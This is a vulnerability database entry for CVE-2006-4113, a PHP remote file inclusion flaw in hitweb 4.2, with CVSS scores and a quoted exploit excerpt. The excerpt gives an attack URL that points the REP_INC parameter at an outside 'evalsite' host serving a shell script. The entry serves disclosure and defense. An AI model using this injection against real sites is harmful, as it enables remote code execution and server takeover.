5.1
CVSSv2

CVE-2006-4113

Published: 14/08/2006 Updated: 19/10/2017
CVSS v2 Base Score: 5.1 | Impact Score: 6.4 | Exploitability Score: 4.9
VMScore: 515
Vector: AV:N/AC:H/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in genpage-cgi.php in Brian Fraval hitweb 4.2 and possibly earlier versions allows remote malicious users to execute arbitrary PHP code via the REP_INC parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

hitweb hitweb

Exploits

Hitweb 42 Remote Include File CreW: ToxiC Bug Found By Drago84 Sorce Code: freshmeatnet/redir/hitweb/15633/url_tgz/hitweb-42_phptgz Problem is: include "$REP_INC/lib_databasephp"; Page: genpage-cgiphp Path: Declare $REP_INC Expl: wwwsitecom/dir_hitweb/genpage-cgiphp?REP_INC=wwwevalsitecom/shellphp? Greatz:St ...